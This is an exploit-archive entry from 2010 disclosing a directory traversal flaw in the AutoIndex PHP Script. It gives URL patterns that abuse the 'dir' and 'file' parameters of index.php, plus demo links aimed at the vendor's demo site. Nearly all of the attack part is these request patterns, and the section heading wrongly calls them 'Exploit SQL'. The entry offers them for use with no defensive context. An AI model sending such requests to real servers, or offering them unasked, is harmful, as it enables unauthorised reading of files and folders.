id: 10637
date: 01/07/2010
title: AutoIndex PHP Script (index.php) Directory Traversal Vulnerability
author: Red-D3v1L
cves: 

==================================================================
AutoIndex PHP Script (index.php) Directory Traversal Vulnerability 
==================================================================


[?] Script:               [ AutoIndex PHP Script ]
[?] Language:             [ PHP ]
[?] Vendor                [http://autoindex.sourceforge.net/]

########################################################################
   
===[ Exploit SQL ]===
   
[»]exploit : [Path]/index.php?dir=[S0me f0LdEr]
 
[»]exploit : [Path]/index.php?dir=&file=[S0me File]
  
[»]dem0:
 
http://autoindex.sourceforge.net/demo/index.php?dir=&file=note.txt       << This file
 
http://autoindex.sourceforge.net/demo/index.php?dir=icon%20tests/test%20dir/   << This FoldEr



#  0day.today [2023-03-24]  #